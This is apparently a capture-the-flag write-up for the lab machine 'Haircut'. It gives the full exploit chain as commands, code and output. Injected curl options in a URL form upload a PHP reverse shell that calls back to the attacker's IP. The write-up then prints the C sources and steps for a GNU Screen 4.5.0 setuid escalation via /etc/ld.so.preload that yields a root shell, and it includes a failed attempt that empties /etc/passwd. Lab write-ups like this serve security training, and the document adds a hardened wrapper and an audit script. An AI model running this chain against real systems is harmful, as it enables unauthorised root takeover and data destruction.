Haircut
Ports scan
u505@kali:~/HTB/Machines/Haircut$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.24
Starting masscan 1.0.5 at 2020-05-05 01:41:23 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.24
Discovered open port 80/tcp on 10.10.10.24
u505@kali:~/HTB/Machines/Haircut$ nmap -sC -sV 10.10.10.24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:41 EDT
Nmap scan report for harcut.htb (10.10.10.24)
Host is up (0.050s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
Web enumeration
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb
<!DOCTYPE html>
<title> HTB Hairdresser </title>
<center>
<br><br><br><br>
<img src="bounce.jpg" height="750" width="1200" alt="" />
<center>
Dirsearch
u505@kali:~/HTB/Machines/Haircut$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u http://haircut.htb

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974

Error Log: /opt/utils/dirsearch/logs/errors-20-05-04_21-52-59.log

Target: http://haircut.htb

[21:52:59] Starting:
[21:53:26] 200 -  144B - /index.html
[21:53:53] 200 -  223B - /test.html
[21:53:56] 403 -  580B - /uploads/

Task Completed
test.html
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb/test.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<img src='carrie.jpg'></img>
</body>
</html>
Extended dirsearch
The first dirsearch found only 2 web pages, and they don't seem important, so we repeat the search with a larger dictionary.
u505@kali:~/HTB/Machines/Haircut$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "js,html,txt,php,jpg" -f -t 50 -u http://haircut.htb/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: js, html, txt, php, jpg | HTTP method: get | Threads: 50 | Wordlist size: 1323125

Error Log: /opt/utils/dirsearch/logs/errors-20-05-04_22-08-34.log

Target: http://haircut.htb/

[22:08:34] Starting:
[22:08:35] 200 -  144B - /index.html
[22:08:37] 403 -  580B - /uploads/
[22:08:45] 200 -  223B - /test.html
[22:10:05] 200 - 132KB - /sea.jpg
[22:11:45] 200 -  141B - /hair.html
[22:12:15] 200 - 114KB - /bounce.jpg
[22:14:45] 200 -  446B - /exposed.php
[22:23:59] 200 - 164KB - /carrie.jpg
CTRL+C detected: Pausing threads, please wait...
[e]xit / [c]ontinue: e

Canceled by the user
Hair.html
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb/hair.html
<!DOCTYPE html>
<title> HTB Hairdresser </title>
<center>
<br><br><br><br>
<img src="sea.jpg" height="750" width="1200" alt="" />
<center>
exposed.php
This page shows a form with a URL field.
The page fetches the URL we give it, and curl's output is displayed on the screen.
We start a simple web server serving a simple PHP page.
u505@kali:~/HTB/Machines/Haircut$ cd www/
u505@kali:~/HTB/Machines/Haircut/www$ cat test.php
<?php phpinfo(); ?>
u505@kali:~/HTB/Machines/Haircut/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
We try our URL: our file is downloaded, but it is only read back, not interpreted.
If we add the modifier -h, curl's usage screen appears, so the field is passed straight to curl as command-line arguments.
We send the URL http://10.10.14.32/test.php -o test.php, but it answers permission denied.
Dirsearch spotted a folder uploads, so we try the value http://10.10.14.32/test.php -o uploads/test.php, and this time our file is interpreted.
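The form behaves this way because the field is pasted into the curl command line, so an embedded -o becomes an extra option. As an added example (my own code, not the page's exposed.php, and the function names are assumed), the Python below shows that vulnerable shape beside a hardened wrapper that validates the value as a single http(s) URL, never goes through a shell, and puts "--" before the URL so curl cannot read it as an option.

```python
import shlex
import subprocess
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def vulnerable_command(user_input: str) -> list:
    """Shape of the bug on the page: the field is pasted into a shell string,
    so 'http://x/a.php -o uploads/a.php' is split into extra curl arguments."""
    return shlex.split("curl " + user_input)


def validate_url(user_input: str) -> str:
    """Accept exactly one plain http(s) URL; reject anything option-like."""
    s = user_input.strip()
    if not s or s.startswith("-") or any(ch.isspace() for ch in s):
        raise ValueError("rejected: empty, option-like, or contains whitespace")
    parsed = urlparse(s)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        raise ValueError("rejected: not an http(s) URL")
    # Caveat: a valid URL still lets the server fetch arbitrary hosts (SSRF);
    # a real deployment should also check parsed.hostname against an allowlist.
    return s


def is_rejected(user_input: str) -> bool:
    try:
        validate_url(user_input)
    except ValueError:
        return True
    return False


def safe_argv(user_input: str) -> list:
    """argv list (no shell) with '--' so curl never parses the value as an
    option; output goes to stdout only, never to a caller-chosen path."""
    return ["curl", "--silent", "--max-time", "10", "--", validate_url(user_input)]


def fetch(user_input: str) -> bytes:
    return subprocess.run(safe_argv(user_input), capture_output=True,
                          check=False).stdout
```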
Reverse shell
We prepare our PHP reverse shell script.
u505@kali:~/HTB/Machines/Haircut/www$ cp /usr/share/webshells/php/php-reverse-shell.php ./
u505@kali:~/HTB/Machines/Haircut/www$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.32';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
We open a listener.
u505@kali:~/HTB/Machines/Haircut$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
We call exposed.php with the following URL http://10.10.14.32/php-reverse-shell.php -o uploads/reverse.php
We call the reverse shell.
u505@kali:~/HTB/Machines/Haircut$ curl http://haircut.htb/uploads/reverse.php
And the reverse shell appears.
u505@kali:~/HTB/Machines/Haircut$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.24.
Ncat: Connection from 10.10.10.24:50962.
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:46:06 up  1:01,  0 users,  load average: 0.02, 0.04, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@haircut:/$ stty raw -echo
stty raw -echo
User Flag
www-data@haircut:/$ cat /home/maria/Desktop/user.txt <USER_FLAG>
Enumeration
www-data@haircut:~$ cd /tmp
www-data@haircut:/tmp$ wget -q http://10.10.14.32/LinEnum.sh
www-data@haircut:/tmp$ wget -q http://10.10.14.32/pspy64
www-data@haircut:/tmp$ chmod +x LinEnum.sh pspy64
The enumeration finds an unusual setuid file, screen-4.5.0.
www-data@haircut:/tmp$ ./LinEnum.sh
...
[-] SUID files:
...
-rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh
...
Searchsploit
u505@kali:~/HTB/Machines/Haircut$ searchsploit screen 4.5
--------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | exploits/linux/local/41152.txt
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Haircut/www$ searchsploit -m 41154
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
File Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Haircut/www/41154.sh
u505@kali:~/HTB/Machines/Haircut/www$ searchsploit -m 41152
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation (PoC)
      URL: https://www.exploit-db.com/exploits/41152
     Path: /usr/share/exploitdb/exploits/linux/local/41152.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Haircut/www/41152.txt
Add line to /etc/passwd
As explained in exploit 41152, screen lets us write files that end up owned by root. So I tried to add a uid 0 user to /etc/passwd.
www-data@haircut:/tmp$ cat /etc/passwd > newfile
www-data@haircut:/tmp$ echo "u505:`openssl passwd hello`:0:0::/:/bin/bash" >> newfile
www-data@haircut:/tmp$ tail newfile
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash
mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false
lightdm:x:111:118:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:112:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
u505:vz5QLJsL/YvB6:0:0::/:/bin/bash
www-data@haircut:/tmp$ /usr/bin/screen-4.5.0 -D -m -L /etc/passwd cat newfile
getpwuid() can't identify your account!
www-data@haircut:/tmp$ ls -l /etc/passwd
-rw-r--r-- 1 0 root 0 May 6 23:35 /etc/passwd
After that the machine was FUBAR: screen truncated /etc/passwd when it opened it as its log file, before it had looked up the calling user, so getpwuid() failed and the file was left empty (size 0 above). This method works to write other files, but not /etc/passwd.
screenroot.sh
This script creates a root shell and a shared library. The shared library changes the owner of the root shell and sets its setuid bit, and screen lets us create the file /etc/ld.so.preload owned by root. Once the setuid screen is run, the shared library is loaded, the rights of our root shell are updated, and we gain full root access to the server. The shell script should work on the target, but the root shell does not compile there, because the headers declaring execvp are missing on the target. So I compiled the files locally and transferred them to the target.
u505@kali:~/HTB/Machines/Haircut$ cat libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* declares chmod(); missing in the exploit-db version, hence the warning below */
#include <unistd.h>

/* runs automatically when the library is loaded via ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] /tmp/rootshell is setuid as root!\n");
}
The shared library changes the owner of our root shell to root and sets its setuid bit.
u505@kali:~/HTB/Machines/Haircut$ gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function ‘dropshell’:
libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
The shared library is compiled.
u505@kali:~/HTB/Machines/Haircut$ cat rootshell.c
#include <stdio.h>
#include <sys/types.h>  /* setuid()/setgid(); missing in the exploit-db version */
#include <unistd.h>     /* execvp(); missing in the exploit-db version, hence the warnings below */

int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execvp() takes a NULL-terminated argv array, not two trailing NULLs */
    char *const argv[] = {"/bin/sh", NULL};
    execvp("/bin/sh", argv);
    return 1;
}
The root shell.
u505@kali:~/HTB/Machines/Haircut$ gcc -o rootshell rootshell.c
rootshell.c: In function ‘main’:
rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
We copy the two compiled files to our www folder so that we can download them from the target.
u505@kali:~/HTB/Machines/Haircut$ cp rootshell libhax.so www
From the target we download the compiled files.
www-data@haircut:/tmp$ wget -q http://10.10.14.32/libhax.so
www-data@haircut:/tmp$ wget -q http://10.10.14.32/rootshell
www-data@haircut:/tmp$ chmod +x rootshell libhax.so
We create the file /etc/ld.so.preload so that the dynamic loader loads the shared library that changes the rights on our root shell.
www-data@haircut:/tmp$ cd /etc
www-data@haircut:/etc$ umask 000
www-data@haircut:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
www-data@haircut:/etc$ ls -l ld.so.preload
ERROR: ld.so: object '
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
-rw-rw-rw- 1 root www-data 16 May 7 00:31 ld.so.preload
We execute screen, which is setuid root.
www-data@haircut:/etc$ screen -ls
ERROR: ld.so: object '
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] /tmp/rootshell is setuid as root!
No Sockets found in /tmp/screens/S-www-data.
We check our rootshell.
www-data@haircut:/etc$ cd /tmp
www-data@haircut:/tmp$ ls -l
total 48
---x--x--x 1 www-data www-data 16136 May 7 00:24 libhax.so
-rwsr-xr-x 1 root root 16824 May 7 00:24 rootshell
drwxr-xr-x 3 root www-data 4096 May 7 00:31 screens
drwx------ 3 root root 4096 May 7 00:20 systemd-private-3fedca1df1a34cdb8373f77ecd96a733-systemd-timesyncd.service-BgcIhT
drwx------ 2 root root 4096 May 7 00:20 vmware-root
Root Flag
www-data@haircut:/tmp$ ./rootshell
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
<ROOT_FLAG>
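As an added defender-side check (my own script, not part of the writeup), the POSIX shell function below audits a host for the traces this chain leaves behind: a setuid screen binary, an /etc/ld.so.preload that is group/world-writable or names a library outside the system library directories, and setuid files sitting in /tmp. The optional argument is a root prefix so the same function can be run against a constructed test tree; the function name and output format are assumptions.

```shell
#!/bin/sh
# audit_preload_abuse [ROOT]  -- ROOT defaults to the live host (run as root so
# every file is readable); pass a directory to audit a constructed tree instead.
audit_preload_abuse() {
    root="${1%/}"
    findings=0

    # 1) a setuid GNU screen binary (the writeup abused /usr/bin/screen-4.5.0)
    for f in "$root"/usr/bin/screen*; do
        if [ -f "$f" ] && [ -u "$f" ]; then
            echo "FINDING setuid screen binary: $f"
            findings=$((findings + 1))
        fi
    done

    # 2) /etc/ld.so.preload normally does not exist; if it does, it must be
    #    writable by root only and list only libraries in system directories
    preload="$root/etc/ld.so.preload"
    if [ -e "$preload" ]; then
        mode=$(ls -ld "$preload" | cut -c1-10)
        case "$mode" in
            ?????w*|????????w?)          # group write (col 6) or world write (col 9)
                echo "FINDING group/world-writable ld.so.preload ($mode)"
                findings=$((findings + 1)) ;;
        esac
        while IFS= read -r line || [ -n "$line" ]; do
            [ -n "$line" ] || continue   # the writeup's file begins with a blank line
            case "$line" in
                /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) ;;
                *) echo "FINDING non-system preload entry: $line"
                   findings=$((findings + 1)) ;;
            esac
        done < "$preload"
    fi

    # 3) setuid executables in world-writable /tmp (paths with spaces would split)
    for f in $(find "$root/tmp" -type f -perm -4000 2>/dev/null); do
        echo "FINDING setuid file in /tmp: $f"
        findings=$((findings + 1))
    done

    echo "TOTAL $findings"
}
```

Source the file and call audit_preload_abuse / on a host; any FINDING line deserves a look, and a non-empty TOTAL on a system nobody hardened that way is a sign of this kind of escalation.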
References
Daniel Simao 15:58, 5 May 2020 (EDT)